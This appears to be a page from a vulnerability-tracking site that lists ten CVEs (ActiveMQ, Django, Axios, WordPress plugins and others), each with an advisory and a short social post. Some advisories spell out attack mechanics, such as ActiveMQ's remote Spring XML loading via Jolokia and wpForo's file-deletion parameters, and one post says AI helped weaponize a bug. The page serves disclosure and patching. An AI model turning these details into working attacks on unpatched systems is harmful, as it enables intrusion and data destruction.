24h | 7d | 30d

Overview

  • Apache Software Foundation
  • Apache ActiveMQ Broker
  • org.apache.activemq:activemq-broker

07 Apr 2026
Published
08 Apr 2026
Updated

CVSS
Pending
EPSS
5.60%

KEV

Description

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue

Statistics

  • 1 Post

Last activity: 21 hours ago

Fediverse

Profile picture fallback

A 13-year-old ActiveMQ RCE bug (CVE-2026-34197) was discovered and weaponized in minutes by researchers using AI, specifically Claude, highlighting the potential of AI in exploit-building. The vulnerability, which allowed arbitrary system command execution through the Jolokia API, has been fixed in newer versions of ActiveMQ Classic.
csoonline.com/article/4157146/

  • 0
  • 0
  • 0
  • 21h ago

Overview

  • djangoproject
  • Django
  • django

05 Nov 2025
Published
26 Feb 2026
Updated

CVSS
Pending
EPSS
0.58%

KEV

Description

An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8. The methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when using a suitably crafted dictionary, with dictionary expansion, as the `_connector` argument. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank cyberstan for reporting this issue.

Statistics

  • 1 Post

Last activity: 21 hours ago

Bluesky

Profile picture fallback
GitHub - omarkurt/django-connector-CVE-2025-64459-testbed: A self-contained testbed for Django CVE-2025-64459. Demonstrates QuerySet.filter() parameter injection via dictionary expansion using Docker.
  • 0
  • 0
  • 0
  • 21h ago

Overview

  • axios
  • axios

09 Apr 2026
Published
09 Apr 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
0.02%

KEV

Description

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0.

Statistics

  • 1 Post

Last activity: 22 hours ago

Bluesky

Profile picture fallback
🚨 New CRITICAL CVE detected in AWS Lambda 🚨 CVE-2025-62718 impacts axios in 4 Lambda base images. Details: https://github.com/aws/aws-lambda-base-images/issues/465 More: https://lambdawatchdog.com/ #AWS #Lambda #CVE #CloudSecurity #Serverless
  • 0
  • 0
  • 0
  • 22h ago

Overview

  • chamilo
  • chamilo-lms

10 Apr 2026
Published
10 Apr 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
Pending

KEV

Description

Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38.

Statistics

  • 1 Post

Last activity: 5 hours ago

Fediverse

Profile picture fallback

🔔 CVE-2026-33698: Chamilo LMS (<1.11.38) has a CRITICAL flaw — exposed install/ dir lets unauth attackers execute PHP & modify files. Upgrade to 1.11.38+ & restrict install/ directory access now! Details: radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 5h ago

Overview

  • Microsoft
  • Windows Server 2012

14 Oct 2025
Published
26 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
75.75%

Description

Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network.

Statistics

  • 1 Post

Last activity: 21 hours ago

Bluesky

Profile picture fallback
Weekly Purple Team Episode: CVE-2025-59287 - Exploiting & Detecting the Critical WSUS RCE
  • 0
  • 0
  • 0
  • 21h ago

Overview

  • Meta
  • react-server-dom-webpack

03 Dec 2025
Published
26 Feb 2026
Updated

CVSS v3.1
CRITICAL (10.0)
EPSS
86.09%

Description

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

Statistics

  • 1 Post

Last activity: 4 hours ago

Bluesky

Profile picture fallback
React2Shell: 766 server compromessi in 24 ore, è corsa alle patch 📌 Link all'articolo : www.redhotcyber.com/post/react2s... A cura di Bajram Zeqiri #redhotcyber #news #ciberattacchi #cybersecurity #hacking #malware #vulnerabilita #react2shell #cve202555182
  • 0
  • 0
  • 0
  • 4h ago

Overview

  • SaturdayDrive
  • Ninja Forms - File Uploads

07 Apr 2026
Published
08 Apr 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
0.07%

KEV

Description

The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.

Statistics

  • 1 Post

Last activity: 19 hours ago

Fediverse

Overview

  • libtiff

25 Jan 2024
Published
09 Apr 2026
Updated

CVSS
Pending
EPSS
0.74%

KEV

Description

A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.

Statistics

  • 1 Post

Last activity: 15 hours ago

Bluesky

Profile picture fallback
libtiff CVE-2023-52356 crashes apps with a single malicious TIFF. Still unpatched on many Rocky/Ubuntu/SUSE boxes. Read more: 👉 tinyurl.com/2sphv8h8 #RockyLinux
  • 0
  • 0
  • 0
  • 15h ago

Overview

  • tomdever
  • wpForo Forum

11 Apr 2026
Published
11 Apr 2026
Updated

CVSS v3.1
HIGH (7.1)
EPSS
Pending

KEV

Description

The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic fields list, an attacker can supply data[body][fileurl] with an arbitrary file path (e.g., wp-config.php or an absolute server path). This poisoned fileurl is persisted to the plugin's custom postmeta database table. Subsequently, when the attacker submits wpftcf_delete[]=body on a topic_edit request, the add_file() method retrieves the stored postmeta record, extracts the attacker-controlled fileurl, passes it through wpforo_fix_upload_dir() which only rewrites legitimate wpforo upload paths and returns all other paths unchanged, and then calls wp_delete_file() on the unvalidated path. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files writable by the PHP process on the server, including critical files such as wp-config.

Statistics

  • 1 Post

Last activity: 1 hour ago

Fediverse

Profile picture fallback

🛡️ CVE-2026-5809: HIGH severity vuln in wpForo Forum plugin ≤3.0.2 lets subscriber+ users delete arbitrary files (e.g., wp-config.php). No patch yet — restrict permissions & monitor topic edits for abuse. radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 1h ago

Overview

  • PowerDNS
  • DNSdist
  • dnsdist

31 Mar 2026
Published
31 Mar 2026
Updated

CVSS v3.1
MEDIUM (5.3)
EPSS
0.02%

KEV

Description

An attacker might be able to trick DNSdist into allocating too much memory while processing DNS over QUIC or DNS over HTTP/3 payloads, resulting in a denial of service. In setups with a large quantity of memory available this usually results in an exception and the QUIC connection is properly closed, but in some cases the system might enter an out-of-memory state instead and terminate the process.

Statistics

  • 1 Post

Last activity: 23 hours ago

Bluesky

Profile picture fallback
🚨 #DNS admins: A single crafted QUIC packet can crash your load balancer (CVE-2026-24030). Patch or mitigate now. Here’s the 60-second iptables fix → tinyurl.com/47b2f936 #Fedora
  • 0
  • 0
  • 0
  • 23h ago
Showing 11 to 20 of 37 CVEs